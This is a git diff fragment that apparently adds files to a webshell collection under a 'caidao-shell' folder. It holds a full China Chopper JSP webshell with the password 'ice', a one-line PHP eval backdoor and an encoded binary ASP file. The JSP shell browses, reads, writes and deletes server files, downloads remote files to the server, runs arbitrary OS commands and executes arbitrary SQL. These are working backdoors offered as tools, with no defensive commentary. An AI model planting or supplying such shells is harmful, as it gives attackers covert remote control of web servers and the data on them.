zC@+<yc<z^N$!XM_e}$cKQe5jee1tG=Y8`gzweb#2knJqsD<Ua|DLrXs<m$H748^|b
zckh;NHit<-Zn!J?C{$H7<l@M*-JxoMDXRn2@Co#?%%>Nf!Xo3Ra2xwKK|=a#<yWL^
z<PN(?%$7Kht4;APrQL!JMOv?AP$igS0c;c9vGBbm0kh*s)22F7x=C?m1e7dv%j{P5
z!!%>r;7^)x?bDeiMG<lb@0}uye;2V?f2u4GZI7o{VunyO38QF+O7<I1wp+V9AlOEY
zz=MSo>`s>xQ%!7UbUT}Uq85Ea;QZxkA%~uWq->l4p>^P9Yi7Ej*5m(CShE%_)Pv#z
Yt|{LLin$dOdsFLRSYXgWZFQ^v1qy?dasU7T

literal 0
HcmV?d00001

diff --git a/caidao-shell/ice.jsp b/caidao-shell/ice.jsp
new file mode 100644
index 0000000..2d89d73
--- /dev/null
+++ b/caidao-shell/ice.jsp
@@ -0,0 +1,59 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+String Pwd="ice";
+String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
+Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
+Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
+void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
+void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
+SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
+sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
+else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
+void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
+for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
+void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
+ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
+os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
+void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
+FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
+{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
+void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
+for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
+}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
+int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
+void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
+void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
+void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
+HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
+while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
+void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
+void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
+while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
+void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
+while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
+void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
+Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
+for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
+void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
+try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
+}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
+catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
+}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
+%><%
+String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
+String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
+StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
+if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
+else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
+else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
+bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
+else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
+else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
+else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
+MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
+else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
+}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
+%>
\ No newline at end of file
diff --git a/caidao-shell/ice.php b/caidao-shell/ice.php
new file mode 100644
index 0000000..dc73cba
--- /dev/null
+++ b/caidao-shell/ice.php
@@ -0,0 +1 @@
+<?php ${${eval($_POST[ice])}};?>
\ No newline at end of file
diff --git a/caidao-shell/mdb.asp b/caidao-shell/mdb.asp
new file mode 100644
index 0000000000000000000000000000000000000000..70141b8387da362be6cb7dafaf81b01e31043882
GIT binary patch
literal 233472
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
